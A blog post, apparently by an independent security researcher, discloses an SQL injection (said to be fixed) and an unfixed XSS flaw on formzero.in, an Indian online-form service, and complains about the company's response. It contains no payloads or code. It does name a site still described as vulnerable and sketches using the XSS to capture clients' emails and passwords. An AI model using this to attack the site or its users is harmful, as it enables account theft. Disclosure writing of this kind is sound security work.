 |
| XSS Vulnerability in formzero.in |
This is a POC formzero.in - POC - SQL Injection (Fixed) & XSS (Not Fixed)
In last few months I discovered and reported a lot of bugs on a lot of different websites. Last month I posted about the askmebazaar.com bug and now this month I am sharing my experience with formzero.in. An Indian company which provides easy to use online form system (similar to Google Forms) to institutes, universities, companies and schools.
Note: Being a responsible software engineer/security researcher, I reported the issue to Form Zero and they fixed the SQL Injection but not the XSS.
What was the security flaw?
First Flaw was SQL Injection. They told me that they were debugging their systems (live systems) and upgrading them during which I got access to their databases because of a mistake from their side and it is not a flaw in their system. Well, first of all I want to say, Come on guys, seriously? well Google updates and maintain its system on a daily basis then Google must get sql injected every day. right?. Second, I checked their systems for 4 days (after I reported about this flaw) & SQL Injection point was still their so I don't think that maintenance goes for 4 days not even in big companies. Anyway, here are some screens of their flaw which they eventually (in 4 day period) figured out and fixed it just so they could deny any attack.
 |
| Database of Form Zero |
 |
| This is their file which was online during debugging time. Still online.. Thanks to Google Cache :D |
Second Flaw is XSS. As you can see in the first picture on top that I could write a whole HTML Form and not just it I could run scripts, html and other evil scripts or I could just send this page with edited HTML to any of their client and get access to their email and passwords. Major issue but according to one of their employee (was a developer) XSS is not a big deal. Well to answer that, Google pays $7,500 for XSS bug. Might not be a big deal XD. Its been a month of me emailing them to fix this XSS Bug and all I have got in response is that they are less on money, going through investment rounds and they cannot pay me and they do not have bug bounty program and now they do not reply. Nice way to thank a cyber security consultant who informed you about a flaw in your website.
 |
| XSS Vulnerable |
What you learned?
First, do not debug live systems like crazy that you expose your system files and open injection points.
It is not someone else's mistake that you left the door open for others to enter your house.Second, XSS is a big deal. Do not underestimate it. Google is not stupid to waste $7,500.
Third, Learn to respect cyber security professionals. Just like you want to get paid and praised for your services, skills and time. We want it too.
I have emailed formzero.in for more than a month now. I haven't got any response from these guys in regards to fixing bugs on their site. I have emailed them over 15 times. I don't think that they will fix it. I will advice the users of this site to be cautious and secure their accounts on their own.
You can Hire me for full time/freelance custom software/web development, security analysis and graphic designing work.
Follow me on @MRKN_Destroy
Email me at : hey24sheep@gmail.com.
Check my wonderful FREE app for Deaf and Mutes
Text Is Speech and Text Is Speech Pro -- (Search for "NEETTECH")
Android: https://goo.gl/iqF4nW
Windows : https://goo.gl/jOf6sX
Windows (Pro Version- Paid) : https://goo.gl/e1l637
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.